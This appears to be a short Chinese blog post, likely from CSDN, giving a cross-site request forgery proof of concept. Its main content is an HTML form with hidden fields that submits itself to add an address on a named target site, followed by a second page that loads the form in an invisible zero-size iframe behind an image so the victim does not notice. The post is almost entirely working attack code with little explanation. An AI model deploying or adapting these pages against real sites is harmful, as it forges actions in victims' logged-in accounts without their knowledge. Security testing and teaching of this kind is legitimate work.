7.CSRF漏洞 POST请求隐藏

首先是新建一个CSRF PoC html文件

 <form action="https://bug.chinacycc.com/action.php" method=POST>
      <input type="hidden" name="type" value="add&#95;address" />
      <input type="hidden" name="info" value="111111" />
      <input type="hidden" name="name" value="11111" />
      <input type="hidden" name="mobile" value="18888888888" />
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="addr&#95;info" value="1" />
</form>
<script> document.forms[0].submit(); </script>

然后用另一个html将其引入,再做隐藏

<img src="这里放一个图片的url">
<iframe src="这里放第一个文件的路径" width="0" height="0"></iframe>
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值